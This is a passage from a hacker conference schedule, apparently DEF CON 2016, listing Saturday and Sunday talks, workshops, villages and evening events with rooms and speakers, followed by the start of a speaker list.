CPV - Bronze 1 - Silicon Valley and DC talk about freedom, crypto, and the cybers - Alex Stamos - CSO at Facebook, Rep. Eric Swalwell (D-CA 15th), Rep. Will Hurd (R-TX 23rd)
CPV - Bronze 2 - Open House - Welcome
CPV - Bronze 2 - Oops, I Cracked My PANs - qu0rum
DC - DC 101 - Escaping The Sandbox By Not Breaking It - Marco Grassi & Qidan He
DC - Track 1 - How to overthrow a Government - Chris Rock
DC - Track 3 - Developing Managed Code Rootkits for the Java Runtime Environment - Benjamin Holland (daedared)
DC - Track 2 - I Fight For The Users, Episode I - Attacks Against Top Consumer Products - Zack Fasel & Erin Jacobs
DL - Table 1 - LAMMA (beta) - Ajit Hatti
DL - Table 2 - CuckooDroid 2.0 - Idan Revivo
DL - Table 3 - Disable Single Step Debug with Xmode Code - Ke Sun & Ya Ou
DL - Table 4 - minimega - David Fritz & John Floren
DL - Table 5 - Dirt Simple Comms v2 (DSC2) - Tyler Oderkirk & Scott Carlson
DL - Table 6 - HoneyPy and HoneyDB - Phillip Maddux
IOT - Bronze 4 - Hot Wheels: Hacking Electronic Wheelchairs - Stephen Chavez
ST - Skyview 3 - To Beat the Toaster, We Must Become the Toaster: How to Show A.I. Who's Boss in the Robot Apocalypse - Jen, Darren
WV - Skyview 2 - Ham Radio Exams
WS - LV BR 1 - Guaranteed Security (Session 1) - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - Cyber Deception: Hunting advanced attacks with MazeRunner - Dean Sysman
WS - LV BR 3 - Brainwashing Embedded Systems - Craig Young
WS - LV BR 4 - Taking a bite out of Apple - John Poulin
WS - LV BR 5 - Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation - Madhu Akula & Riyaz Walikar
WS - LV BR 6 - Embedded system design: from electronics to microkernel development - Rodrigo Maximiano Antunes de Almeida
WS - LV BR 7 - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick
WOS - Skyview 6 - To Catch An APT: YARA - Jay DiMartino
Saturday - 11:00
BHV - Skyview 4 - Biohackers Die - Jeffrey Tibbetts
BHV - Skyview 4 - Microscopes are Stupid - Louis Auguste
BHV - Skyview 4 - Attacking EMR (Electronic Health Records) - Using HL7 and DICOM to Hack Critical Infrastructure - Michael Hudson
BHV - Skyview 4 - Implants - Amal Graafstra
CPV - Bronze 1 - SSL Visibility, Uncovered - Andrew Brandt - Director of Threat Research at Blue Coat Systems
CPV - Bronze 2 - JWTs in a flash! - Evan Johnson (ejcx_) - Security Systems Engineer at CloudFlare
CPV - Bronze 2 - The State of HTTPS: securing web traffic is not what it used to be - J0N J4RV1S
DC - DC 101 - Secure Penetration Testing Operations: Demonstrated Weaknesses in Learning Material and Tools - Wesley McGrew
DC - Track 1 - Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker - Evan Booth (Fort)
DC - Track 3 - Picking Bluetooth Low Energy Locks from a Quarter Mile Away - Anthony Rose & Ben Ramsey
DC - Track 2 - Light-Weight Protocol! Serious Equipment! Critical Implications! - Lucas Lundgren & Neal Hindocha
DL - Table 1 - cont...(10:00-11:50) - LAMMA (beta) - Ajit Hatti
DL - Table 2 - cont...(10:00-11:50) - CuckooDroid 2.0 - Idan Revivo
DL - Table 3 - cont...(10:00-11:50) - Disable Single Step Debug with Xmode Code - Ke Sun & Ya Ou
DL - Table 4 - cont...(10:00-11:50) - minimega - David Fritz & John Floren
DL - Table 5 - cont...(10:00-11:50) - Dirt Simple Comms v2 (DSC2) - Tyler Oderkirk & Scott Carlson
DL - Table 6 - cont...(10:00-11:50) - HoneyPy and HoneyDB - Phillip Maddux
ST - Skyview 3 - God is a Human II - Artificial Intelligence and the Nature of Reality - Cassiopiea
WV - Skyview 1 - Evil ESP - Eric Escobar and Matt Trimble
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(10:00-14:00) - Guaranteed Security (Session 1) - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(10:00-14:00) - Cyber Deception: Hunting advanced attacks with MazeRunner - Dean Sysman
WS - LV BR 3 - cont...(10:00-14:00) - Brainwashing Embedded Systems - Craig Young
WS - LV BR 4 - cont...(10:00-14:00) - Taking a bite out of Apple - John Poulin
WS - LV BR 5 - cont...(10:00-14:00) - Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation - Madhu Akula & Riyaz Walikar
WS - LV BR 6 - cont...(10:00-14:00) - Embedded system design: from electronics to microkernel development - Rodrigo Maximiano Antunes de Almeida
WS - LV BR 7 - cont...(10:00-14:00) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick
WOS - Skyview 6 - How to Find 1,352 WordPress XSS Plugin Vulnerabilities in 1 Hour (not really) - Larry Cashdollar
Saturday - 12:00
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
BHV - Skyview 4 - The New White Hat Hacking: Computational Biology for the Good of Mankind - Rock Stevens and Candice Schumann
BHV - Skyview 4 - Reverse engineering biological research equipment for fun and open science - Charles Fracchia and Joel Dapello
CPV - Bronze 1 - Code breaking - Catching a cheat - Nezer Zaidenberg (scipio)
CPV - Bronze 2 - Overview and evolution of password-based authentication schemes - Ignat Korchagin
CPV - Bronze 2 - Open House - Key Signing Party & Lightning Talks
DC - DC 101 - Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5 - Luke Young
DC - Track 1 - Bypassing Captive Portals and Limited Networks - Grant Bugher
DC - Track 1 - Retweet to win: How 50 lines of Python made me the luckiest guy on Twitter - Hunter Scott
DC - Track 3 - CANSPY: A Framework for Auditing CAN Devices - Jonathan-Christofer Demay & Arnaud Lebrun
DC - Track 2 - pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon
DC - Track 2 - Stargate: Pivoting Through VNC To Own Internal Networks - Yonathan Klijnsma & Dan Tentler
DL - Table 1 - Android-InsecureBank - Dinesh Shetty
DL - Table 2 - DataSploit - Shubham Mittal
DL - Table 3 - Boscloner - All in One RFID Cloning Toolkit - Phillip Bosco
DL - Table 4 - Automated Penetration Toolkit (APT2) - Adam Compton
DL - Table 5 - DEF CON Wireless Collection Service (DCWCS) - darkmatter
DL - Table 6 - Emo-Tool/OldYeller/Ransomware-Simulator - Weston Hecker
HHV - Contest Area - An Introduction To Pulling Software From Flash via I2C, SPI and JTAG - Matt DuHarte
IOT - Bronze 4 - How the Smart-City becomes Stupid - Denis Makrushin, Vladimir Daschenko, Kaspersky Lab
ST - Skyview 3 - Art of Espionage (v.303) - Pyr0, Lizzie Borden
WV - Skyview 1 - Slaying Rogue Access Points with Python and Cheap Hardware - Gabriel Ryan
WV - Skyview 1 - Insteon, Inste-off, Inste-open? - Caleb Mays and Ben Ramsey
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(10:00-14:00) - Guaranteed Security (Session 1) - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(10:00-14:00) - Cyber Deception: Hunting advanced attacks with MazeRunner - Dean Sysman
WS - LV BR 3 - cont...(10:00-14:00) - Brainwashing Embedded Systems - Craig Young
WS - LV BR 4 - cont...(10:00-14:00) - Taking a bite out of Apple - John Poulin
WS - LV BR 5 - cont...(10:00-14:00) - Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation - Madhu Akula & Riyaz Walikar
WS - LV BR 6 - cont...(10:00-14:00) - Embedded system design: from electronics to microkernel development - Rodrigo Maximiano Antunes de Almeida
WS - LV BR 7 - cont...(10:00-14:00) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick
WOS - Skyview 6 - Music - DJ - tense future
WOS - Skyview 6 - HTTP/2 & QUIC: Teaching Good Protocols To Do Bad Things - Catherine (Kate) Pearce, Carl Vincent
Saturday - 13:00
BHV - Skyview 4 - DIYBioweapons and Regulation - Meow Ludo Meow Meow
BHV - Skyview 4 - IoT of Dongs - RenderMan
BHV - Skyview 4 - Ethical Challenges & Responsibilities of Biohackers and Artists - John Sundman
CPV - Bronze 2 - cont...(12:30-13:30) - Open House - Key Signing Party & Lightning Talks
CPV - Bronze 2 - Breaking Bad Crypto: BB'06 [WORKSHOP] - Filippo Valsorda
DC - DC 101 - NG9-1-1: The Next Generation of Emergency Ph0nage - CINCVolFLT & AK3R303
DC - Track 1 - Six Degrees of Domain Admin ... - Andy Robbins, Rohan Vazarkar, Will Schroeder
DC - Track 3 - Cunning with CNG: Soliciting Secrets from Schannel - Jake Kambic
DC - Track 2 - MouseJack: Injecting Keystrokes into Wireless Mice - Marc Newlin
DL - Table 1 - cont...(12:00-13:50) - Android-InsecureBank - Dinesh Shetty
DL - Table 2 - cont...(12:00-13:50) - DataSploit - Shubham Mittal
DL - Table 3 - cont...(12:00-13:50) - Boscloner - All in One RFID Cloning Toolkit - Phillip Bosco
DL - Table 4 - cont...(12:00-13:50) - Automated Penetration Toolkit (APT2) - Adam Compton
DL - Table 5 - cont...(12:00-13:50) - DEF CON Wireless Collection Service (DCWCS) - darkmatter
DL - Table 6 - cont...(12:00-13:50) - Emo-Tool/OldYeller/Ransomware-Simulator - Weston Hecker
IOT - Bronze 1 - SNMP and IoT Devices: Let me Manage that for you Bro! - Bertin Bervis
ST - Skyview 3 - Accessibility: A Creative Solution to Living Without Sight - Shaf Patel
Vendors Area - No Starch Press booth - Nick Cano, Game Hacking - book signing
WV - Skyview 1 - Drone Hijacking and other IoT hacking with GNU Radio and XTRX SDR - Arthur Garipov
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(10:00-14:00) - Guaranteed Security (Session 1) - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(10:00-14:00) - Cyber Deception: Hunting advanced attacks with MazeRunner - Dean Sysman
WS - LV BR 3 - cont...(10:00-14:00) - Brainwashing Embedded Systems - Craig Young
WS - LV BR 4 - cont...(10:00-14:00) - Taking a bite out of Apple - John Poulin
WS - LV BR 5 - cont...(10:00-14:00) - Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation - Madhu Akula & Riyaz Walikar
WS - LV BR 6 - cont...(10:00-14:00) - Embedded system design: from electronics to microkernel development - Rodrigo Maximiano Antunes de Almeida
WS - LV BR 7 - cont...(10:00-14:00) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick
WOS - Skyview 6 - Music - DJ - phreakocious
WOS - Skyview 6 - Now You See Me, Now You Don't - Joey Muniz and Aamir Lakhani
Saturday - 14:00
BHV - Skyview 4 - Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode - Awesome Folks from Various BioHacking Podcasts
CPV - Bronze 2 - cont...(13:30-15:00) - Breaking Bad Crypto: BB'06 [WORKSHOP] - Filippo Valsorda
DC - DC 101 - SITCH - Inexpensive, Coordinated GSM Anomaly Detection - ashmastaflash
DC - Track 1 - Weaponizing Data Science for Social Engineering: Automated E2E spear phishing on Twitter - Delta Zero & KingPhish3r
DC - Track 3 - Hacker-Machine Interface - State of the Union for SCADA HMI Vulnerabilities - Brian Gorenc & Fritz Sands
DC - Track 2 - Universal Serial aBUSe: Remote physical access attacks - Rogan Dawes & Dominic White
DL - Table 1 - Cloakify Exfiltration Toolset - TryCatchHCF
DL - Table 2 - DNS Analyse - John Heise
DL - Table 3 - PKI for the People - Ze'ev Glozman
DL - Table 4 - CrackMapExec - Marcello Salvati
DL - Table 5 - VirusTotalego - Christian Heinrich & Karl Hiramoto
DL - Table 6 - WebSec: a cross platform large scale vulnerability scanner - Dragos Boia
ST - Skyview 3 - Practical Penetration Testing of Embedded Devices - James Edge
Vendors Area - No Starch Press booth - Jon Erickson, Hacking, 2nd Edition - book signing
WV - Skyview 1 - It's Just Software, Right? - Abraxas3d and Skunkworks
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - Guaranteed Security (Session 2) - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach - Ajit Hatti
WS - LV BR 3 - Ready? Your Network is Being Pwned NOW! - Robin Jackson & Ed Williams
WS - LV BR 4 - Hands-on Cryptography with Python - Sam Bowne & Dylan James Smith
WS - LV BR 5 - Fuzzing Android Devices - Anto Joseph
WS - LV BR 6 - PCB Design Crash Course: A primer to designing your own hacking tools. - Seth Wahle
WS - LV BR 7 - Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
WOS - Skyview 6 - Music - DJ - %27
WOS - Skyview 6 - Attacks on Enterprise Social Media - Mike Raggo
Saturday - 15:00
BHV - Skyview 4 - Biotechnology Needs a Security Patch...Badly - Ed You
BHV - Skyview 4 - Standardizing the Secure Deployment of Medical Devices - Chris Frenz
BHV - Skyview 4 - 0day for the Soul - Tarah
BHV - Skyview 4 - The Bioethics of BioHacking - Christian Dameff
CPV - Bronze 2 - Ask the EFF: The Year in Digital Civil Liberties - Kurt Opsahl, Nate Cardozo, Andrew Crocker, Dr. Jeremy Giliula, Eva Galperin, Katitza Rodriguez - EFF
DC - DC 101 - Phishing without Failure and Frustration - Jay Beale
DC - Track 1 - Forcing a Targeted LTE Cellphone into Unsafe Network - Haoqi Shan & Wanqiao Zhang
DC - Track 3 - Exploiting and attacking seismological networks.. remotely - Bertin Bervis Bonilla & James Jara
DC - Track 2 - Playing Through the Pain? - The Impact of Secrets and Dark Knowledge - Richard Thieme
DL - Table 1 - cont...(14:00-15:50) - Cloakify Exfiltration Toolset - TryCatchHCF
DL - Table 2 - cont...(14:00-15:50) - DNS Analyse - John Heise
DL - Table 3 - cont...(14:00-15:50) - PKI for the People - Ze'ev Glozman
DL - Table 4 - cont...(14:00-15:50) - CrackMapExec - Marcello Salvati
DL - Table 5 - cont...(14:00-15:50) - VirusTotalego - Christian Heinrich & Karl Hiramoto
DL - Table 6 - cont...(14:00-15:50) - WebSec: a cross platform large scale vulnerability scanner - Dragos Boia
HHV - Contest Area - Workshop-Hands on JTAG for Fun and Root Shells II - Joe FitzPatrick, Piotr Esden-Tempski
IOT - Bronze 1 - Reversing and Exploiting Embedded Devices - Elvis Collado, Praetorian, Senior Security Researcher
IOT - Bronze 4 - Internet of Thieves (or DIY Persistence) - Joseph Needleman
ST - Skyview 3 - Tales from the Dongosphere: Lessons Learned Hosting Public Email for 4chan - Vincent Canfield
Vendors Area - No Starch Press booth - The Smart Girls Guide to Privacy - book signing
WV - Skyview 1 - Blinded by the Light - tb68r and Tim Quester
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Guaranteed Security (Session 2) - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(14:00-18:00) - Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach - Ajit Hatti
WS - LV BR 3 - cont...(14:00-18:00) - Ready? Your Network is Being Pwned NOW! - Robin Jackson & Ed Williams
WS - LV BR 4 - cont...(14:00-18:00) - Hands-on Cryptography with Python - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(14:00-18:00) - Fuzzing Android Devices - Anto Joseph
WS - LV BR 6 - cont...(14:00-18:00) - PCB Design Crash Course: A primer to designing your own hacking tools. - Seth Wahle
WS - LV BR 7 - cont...(14:00-18:00) - Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
WOS - Skyview 6 - Music - DJ - Moon in Gemini
WOS - Skyview 6 - Dynamic Population Discovery for Lateral Movement Detection (Using Machine Learning) - Rod Soto and Joseph Zadeh
Saturday - 16:00
BHV - Skyview 4 - Reversing Your Own Source Code - Cosmo Mielke
BHV - Skyview 4 - The Era of Bio Big Data: Benefits and Challenges for Information Security, Health, the Economy, and National Security - Edward You
BHV - Skyview 4 - The Next Big Thing in Bioterrorism - Victoria Sutton
CPV - Bronze 2 - Highlights from the Matasano Challenges [WORKSHOP] - Matt Cheung
DC - DC 101 - A Journey Through Exploit Mitigation Techniques in iOS - Max Bazaliy
DC - DC 101 - Esoteric Exfiltration - Willa Cassandra Riggins(abyssknight)
DC - Track 1 - "Cyber" Who Done It?! Attribution Analysis Through Arrest History - Jake Kouns
DC - Track 3 - Ask the EFF - Panel
DC - Track 3 - I've got 99 Problems, but LittleSnitch ain't one - Patrick Wardle
DC - Track 2 - DIY Nukeproofing: a new dig at "data-mining" - 3AlarmLampScooter
DC - Track 2 - All Your Solar Panels are belong to Me - Fred Bret-Mounet
DL - Table 1 - BurpSmartBuster - Patrick Mathieu
DL - Table 2 - OXML XXE - Willis Vandevanter
DL - Table 3 - Graylog - Lennart Koopman
DL - Table 4 - Visual Network and File Forensics using Rudra - Ankur Tyagi
DL - Table 5 - OWASP ZSC Shellcode - Johanna Curiel & Ali Ramzoo
DL - Table 6 - Deep look at back end systems of the future of credit card fraud. - Weston Hecker
HHV - Contest Area - cont...(15:00-16:59) - Workshop-Hands on JTAG for Fun and Root Shells II - Joe FitzPatrick, Piotr Esden-Tempski
IOT - Bronze 1 - Tranewreck - Jeff Kitson, Trustwave SpiderLabs, Security Researcher
SE - Palace 2-5 - Human Hacking: You ARE the weakest link. - Cyni Winegard & Bethany Ward
ST - Skyview 3 - Opps! I made a machine gun: The Progressive Lowering of the Barrier to Entry in Firearms Manufacturing - Gingerbread
WV - Skyview 1 - Multi-channel Wardriving Tools for IEEE 802.15.4 and Beyond - Tom Hayes
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Guaranteed Security (Session 2) - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(14:00-18:00) - Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach - Ajit Hatti
WS - LV BR 3 - cont...(14:00-18:00) - Ready? Your Network is Being Pwned NOW! - Robin Jackson & Ed Williams
WS - LV BR 4 - cont...(14:00-18:00) - Hands-on Cryptography with Python - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(14:00-18:00) - Fuzzing Android Devices - Anto Joseph
WS - LV BR 6 - cont...(14:00-18:00) - PCB Design Crash Course: A primer to designing your own hacking tools. - Seth Wahle
WS - LV BR 7 - cont...(14:00-18:00) - Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
WOS - Skyview 6 - Music - DJ - TK
WOS - Skyview 6 - Fuzzing For Humans: Real Fuzzing in the Real World - Joshua Pereyda
Saturday - 17:00
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
BHV - Skyview 4 - The Brave New World of Bio-Entrepreneurship - Jun Axup
BHV - Skyview 4 - The collision of prosthetics, robotics and the human interface - Randall Alley
BHV - Skyview 4 - Intro to Brain Based Authentication - NeuroTechX
BHV - Skyview 4 - Make your own Brain device - NeuroTechX
CPV - Bronze 2 - cont...(16:00-18:00) - Highlights from the Matasano Challenges [WORKSHOP] - Matt Cheung
DC - DC 101 - Sticky Keys To The Kingdom: Pre-auth RCE Is More Common Than You Think - Linuz & Medic
DC - DC 101 - Propaganda and you (and your devices)... - The Bob Ross Fan Club
DC - Track 1 - Drunk Hacker History
DC - Track 3 - Crypto State of the Law - Nate Cardozo
DC - Track 2 - Abusing Bleeding Edge Web Standards for AppSec Glory - Bryant Zadegan & Ryan Lester
DL - Table 1 - cont...(16:00-17:50) - BurpSmartBuster - Patrick Mathieu
DL - Table 2 - cont...(16:00-17:50) - OXML XXE - Willis Vandevanter
DL - Table 3 - cont...(16:00-17:50) - Graylog - Lennart Koopman
DL - Table 4 - cont...(16:00-17:50) - Visual Network and File Forensics using Rudra - Ankur Tyagi
DL - Table 5 - cont...(16:00-17:50) - OWASP ZSC Shellcode - Johanna Curiel & Ali Ramzoo
DL - Table 6 - cont...(16:00-17:50) - Deep look at back end systems of the future of credit card fraud. - Weston Hecker
IOT - Bronze 4 - Thermostat Ransomware and Workshop - Pen Test Partners
SE - Palace 2-5 - ….and bad mistakes I’ve made a few…. - Jayson Street
ST - Skyview 3 - The next John Moses Browning will use GitHub - Karl Kasarda, Iam McCollum
WV - Skyview 1 - Imagine a Beowulf cluster of Pineapples! - Darren Kitchen and Seb Kinne
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Guaranteed Security (Session 2) - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(14:00-18:00) - Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach - Ajit Hatti
WS - LV BR 3 - cont...(14:00-18:00) - Ready? Your Network is Being Pwned NOW! - Robin Jackson & Ed Williams
WS - LV BR 4 - cont...(14:00-18:00) - Hands-on Cryptography with Python - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(14:00-18:00) - Fuzzing Android Devices - Anto Joseph
WS - LV BR 6 - cont...(14:00-18:00) - PCB Design Crash Course: A primer to designing your own hacking tools. - Seth Wahle
WS - LV BR 7 - cont...(14:00-18:00) - Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
WOS - Skyview 6 - Music - DJ - yurk
WOS - Skyview 6 - Mining VirusTotal for Operational Data and Applying a Quality Control On It - Gita Ziabari
Saturday - 18:00
BHV - Skyview 4 - The Rise of Digital Medicine: At-home digital clinical research - Andrea Coravos
BHV - Skyview 4 - Designer Babies - Christian and Erin
CPV - Bronze 2 - Open House
DC - Track 1 - cont...(17:00-18:59) - Drunk Hacker History
IOT - Bronze 4 - cont...(17:00-18:30) - Thermostat Ransomware and Workshop - Pen Test Partners
SE - Palace 2-5 - SCAM CALL – Call Dropped - Mattias Borg
ST - Skyview 3 - Taking Down Skynet (By Subverting the Command and Control Channel) - Phax
WOS - Skyview 6 - Music - DJ - phreakocious
WOS - Skyview 6 - Fiddler on the Roof: A No-Nonsense Look at Fiddler and Its Usage - Morgan "Indrora" Gangwere
Saturday - 19:00
SE - Palace 2-5 - How to Un-Work your job: Revolutions, Radicals and Engineering by Committee. - Steven Zani
Saturday - 20:00
Ballys - Skyview 5 - Hacker Karaoke
DC - Track 1 - Hacker Jeopardy
Paris - Track 2 - Music - djdead
SE - Palace 2-5 - Advanced social engineering techniques and the rise of cyber scams industrial complex - Fadli Sidek
Saturday - 21:00
Ballys - Skyview 5 - cont...(21:00-01:59) - Hacker Karaoke
DC - Track 1 - cont...(20:00-21:59) - Hacker Jeopardy
Paris - Track 2 - Music - DJ Callum McGowan
Saturday - 22:00
Ballys - Blu Pool - IOActive FreakShow 2016
Ballys - Skyview 5 - cont...(22:00-01:59) - Hacker Karaoke
Paris - Track 2 - Music - CTRL/rsm
Saturday - 23:00
Ballys - Blu Pool - cont...(22:00-02:59) - IOActive FreakShow 2016
Ballys - Skyview 5 - cont...(23:00-01:59) - Hacker Karaoke
Paris - Track 2 - Music - Information Society
ST - Skyview 3 - Music - 303 - Featured Performer Pictureplane with special guest Miss DJ Jackalope and special hard dance sets from DJ Ritual and DJ Slave1
Saturday - 01:00
ST - Skyview 3 - cont...(01:00-01:59) - Music - 303 - Featured Performer Pictureplane with special guest Miss DJ Jackalope and special hard dance sets from DJ Ritual and DJ Slave1
Sunday - 00:00
Ballys - Blu Pool - cont...(22:00-02:59) - IOActive FreakShow 2016
Paris - Track 2 - cont...(23:00-00:14) - Music - Information Society
Paris - Track 2 - Music - Berlin
ST - Skyview 3 - cont...(00:00-01:59) - Music - 303 - Featured Performer Pictureplane with special guest Miss DJ Jackalope and special hard dance sets from DJ Ritual and DJ Slave1
Sunday - 01:00
Ballys - Blu Pool - cont...(22:00-02:59) - IOActive FreakShow 2016
Paris - Track 2 - cont...(00:15-01:29) - Music - Berlin
Paris - Track 2 - Music - DJ Manila Ice
Sunday - 02:00
Ballys - Blu Pool - cont...(22:00-02:59) - IOActive FreakShow 2016
Paris - Track 2 - cont...(01:30-02:30) - Music - DJ Manila Ice
Sunday
This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.
Sunday - 09:00
ST - Skyview 3 - What's Lurking Inside MP3 Files That Can Hurt You? - Mike Raggo, Chet Hosmer
Sunday - 10:00
BHV - Skyview 4 - CRISPR/Cas9: Newest Tools for Biohacking fun - Dr. Thomas P. Keenan
DC - DC 101 - How to get good seats in the security theater? Hacking boarding passes for fun & profit. - Przemek Jaroszewski
DC - Track 1 - How to do it Wrong: Smartphone Antivirus and Security Applications Under Fire - Stephan Huber & Siegfried Rasthofer
DC - Track 3 - Examining the Internet's pollution - Karyn Benson
DC - Track 2 - Hacking Hotel Keys and Point of Sale systems ... - Weston Hecker
IOT - Bronze 4 - 0-day Hunting - TBA
ST - Skyview 3 - The other way to get a hairy hand; or, contracts for hackers - Brendan Oconnor
Sunday - 11:00
BHV - Skyview 4 - WELCOME TO THE LAST DAY OF BHV! - Staff
BHV - Skyview 4 - The Future is Fake Identities - Paul Ashley
BHV - Skyview 4 - Might as well name it Parmigiana, American, Cheddar, and Swiss - Ken Belva
BHV - Skyview 4 - Hacking Sensory Perception - Scott Novich
BHV - Skyview 4 - Implants - Amal Graafstra
CPV - Bronze 2 -
CPV - Bronze 2 - Managing digital codesigning identities in an engineering company - Evgeny Sidorov, Eldar Zaitov
DC - DC 101 - Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game - Joshua Drake & Steve Christey Coley
DC - Track 1 - Hiding Wookiees in HTTP - HTTP smuggling... - regilero
DC - Track 3 - Use Their Machines Against Them: Loading Code with a Copier - Mike
DC - Track 2 - Discovering and Triangulating Rogue Cell Towers - JusticeBeaver
IOT - Bronze 1 - IoT Defenses - Software, Hardware, Wireless and Cloud - Aaron Guzman, Principal Penetration Tester
IOT - Bronze 4 - cont...(10:00-11:59) - 0-day Hunting - TBA
ST - Skyview 3 - Front Door Nightmare - obiwan666
WOS - Skyview 6 - Music - DJ - kampf
WOS - Skyview 6 - Building a Local Passive DNS Tool for Threat Intelligence Research - Kathy Wang
Sunday - 12:00
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
BHV - Skyview 4 - How to use the Scientific Method in Security Research - Jay Radcliffe
CPV - Bronze 1 - "My Usability Goes to 11": A Hacker's Guide to User Experience Research - Greg Norcie - Staff Technologist at Center for Democracy & Technology
CPV - Bronze 2 - Crypto for Criminals: The OPSEC Concerns in Using Cryptography - John Bambenek - Manager of Threat Systems at Fidelis Cybersecurity
CPV - Bronze 2 - Backdooring Cryptocurrencies: The Underhanded Crypto Contest Winners - Taylor Hornby, Adam Caudill
DC - DC 101 - So you think you want to be a penetration tester - Anch
DC - Track 1 - Attacking BaseStations - an Odyssey through a Telco's Network - Hendrik Schmidt & Brian Butterly
DC - Track 3 - Game over, man! - Reversing Video Games to Create an Unbeatable AI Player - Dan "AltF4" Petro
DC - Track 2 - Let's Get Physical: Network Attacks Against Physical Security Systems - Ricky "HeadlessZeke" Lawshae
HHV - Contest Area - EagleCAD Basics - Casey
ST - Skyview 3 - Active Incident Response - brain, xian
WOS - Skyview 6 - Music - DJ - VNA
WOS - Skyview 6 - LTE and Its Collective Insecurity - Chuck McAuley and Chris Moore
Sunday - 13:00
BHV - Skyview 4 - How your doctor might be trying to kill you and how personal genomics can save your life - dlaw and razzies
BHV - Skyview 4 - Neuro Ethics - Dr. Stanislav Naydin and Vlad Gostomelsky
BHV - Skyview 4 - Attention Hackers: Cannabis Needs Your Help! - Michael Zaytsev
BHV - Skyview 4 - Nootropics: Better Living Through Chemistry or Modern-Day Prometheus - GingerBread
CPV - Bronze 2 - Open House - Thank You!
DC - DC 101 - Mouse Jiggler Offense and Defense - Dr. Phil
DC - Track 1 - Can You Trust Autonomous Vehicles: Contactless Attacks ... - Jianhao Liu,Wenyuan Xu,Chen Yan
DC - Track 3 - Backdooring the Frontdoor - Jmaxxz
DC - Track 2 - Drones Hijacking - multi-dimensional attack vectors & countermeasures - Aaron Luo
ST - Skyview 3 - Homologation - Friend or Frenemy? - Shane Kemper, the headless chook
WOS - Skyview 6 - Music - DJ - yurk
WOS - Skyview 6 - Incident Code Name: When SkyFalls A Shaken, Not Stirred, James Bond Tale on Incident Response - Plug
Sunday - 14:00
BHV - Skyview 4 - Biohacking Street Law - Victoria Sutton
DC - DC 101 - Toxic Proxies - Bypassing HTTPS & VPNs to pwn your online identity - Alex Chapman & Paul Stone
DC - Track 1 - Help, I've got ANTs!!! - Tamas Szakaly
DC - Track 3 - VLAN hopping, ARP poisoning & MITM Attacks in Virtualized Environments - Ronny Bull, Dr. Jeanna N. Matthews, Ms. Kaitlin A. Trumbull
DC - Track 2 - An introduction to Pinworm: man in the middle for your metadata - bigezy & saci
WOS - Skyview 6 - Closing Ceremony
Sunday - 15:00
DC - DC 101 - Auditing 6LoWPAN Networks using Standard Penetration Testing Tools - Jonathan-Christofer Demay
DC - Track 1 - Stumping the Mobile Chipset - Adam Donenfeld
DC - Track 3 - Platform Agnostic Kernel Fuzzing - James Loureiro & Georgi Geshev
DC - Track 2 - Cyber Grand Shellphish - Shellphish Panel
WOS - Skyview 6 - cont...(14:10-15:59) - Closing Ceremony
Sunday - 16:00
DC - Track 1 - Closing Ceremonies
DC - Track 3 - Closing Ceremonies
DC - Track 2 - Closing Ceremonies
Sunday - 17:00
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
DC - Track 1 - cont...(16:30-17:59) - Closing Ceremonies
DC - Track 3 - cont...(16:30-17:59) - Closing Ceremonies
DC - Track 2 - cont...(16:30-17:59) - Closing Ceremonies
Speaker List
3AlarmLampScooter
Aamir Lakhani
Aaron Guzman, Principal Penetration Tester
Aaron Luo
Abraxas3d
Adam Caudill
Adam Compton
Adam Donenfeld
Adam Reziouk
Aditya Gupta
Ajit Hatti
AK3R303
Alan
Alex Chapman
Alex Stamos
Ali Ramzoo
Alisha Kloc
Allan Cecil
Amal Graafstra
Amanda Plimpton/Evan Anderson
Amanda Rousseau
